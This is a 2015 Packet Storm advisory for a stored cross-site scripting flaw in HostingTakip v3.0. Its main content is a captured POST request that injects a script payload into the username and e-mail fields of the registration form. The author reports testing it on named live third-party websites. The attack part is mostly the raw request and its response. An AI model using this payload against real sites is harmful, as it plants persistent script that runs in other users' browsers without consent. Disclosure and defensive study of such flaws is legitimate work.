HostingTakip 3.0 Cross Site Scripting

2015-03-13T00:00:00
ID PACKETSTORM:130821
Type packetstorm
Reporter KnocKout
Modified 2015-03-13T00:00:00

Description

                                        
                                            `HostingTakip v3.0 - Stored XSS Vulnerability  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Discovered by: KnocKout  
[~] Contact : knockout@e-mail.com.tr  
[~] HomePage : http://h4x0resec.blogspot.com  
Love to _UnDeRTaKeR_ & BARCOD3 & Septemb0x & ZoRLu ( milw00rm.com )  
############################################################  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Web App. : HostingTakip  
|~Affected Version : v3.0   
|~Software : http://www.hostingtakip.com & http://wmscripti.com/php-scriptler/hostingtakip-hosting-yonetim-scripti.html  
|~Official Demo : http://hostingtakip.teknoder.com/demo/  
|~RISK : Medium  
|~Tested On : [L] Windows 7, Mozilla Firefox  
####################INFO################################  
XSS payload is possible to run in your registration form.  
click on "Yeni Müşteri" Here the e-mail section appears unprotected been no filtering  
Any payload code to enter "uye-duzenle.php" on will be permanent and will work  
########################################################  
Tested on;  
http://www.ayashosting.com  
http://www.oneritasarim.com/hostingtakip/  
----------------------------------------------------------  
Proof image: http://i.hizliresim.com/mGZzQ8.png  
----------------------------------------------------------  
Request  
----------------------------------------------------------  
POST http://www.oneritasarim.com/hostingtakip/kayit_tamamla.php   
Request Headers:  
Host[www.oneritasarim.com]  
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0]  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]  
Accept-Language[tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3]  
Accept-Encoding[gzip, deflate]  
Referer[http://www.oneritasarim.com/hostingtakip/y_kullanici.php]  
Cookie[PHPSESSID=1b4b474c7fc50e0885aae61274ac0b55; __utma=221857094.828791546.1426246879.1426246879.1426246879.1; __utmc=221857094; __utmz=221857094.1426246879.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)]  
Connection[keep-alive]  
Post Data:  
kadi[%3C%2Fscript%3E%3Cscript%3Ealert%28%27h4+Here%27%29%3C%2Fscript%3E]  
posta[%3C%2Fscript%3E%3Cscript%3Ealert%28%27h4+Here%27%29%3C%2Fscript%3E]  
sifre[123456]  
ad[123456]  
tc[012345678901]  
tel[12345678901]  
mustip[b]  
sehir[h4]  
ilce[h4]  
adres[h4x0resec.blogspot.com]  
hakkimda[h4]  
guv[1b4b47]  
B1[G%F6nder]  
Response Headers:  
Content-Encoding[gzip]  
Vary[Accept-Encoding]  
Date[Fri, 13 Mar 2015 12:18:10 GMT]  
Server[LiteSpeed]  
Connection[close]  
Expires[Thu, 19 Nov 1981 08:52:00 GMT]  
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]  
Pragma[no-cache]  
Content-Type[text/html]  
Content-Length[143]  
`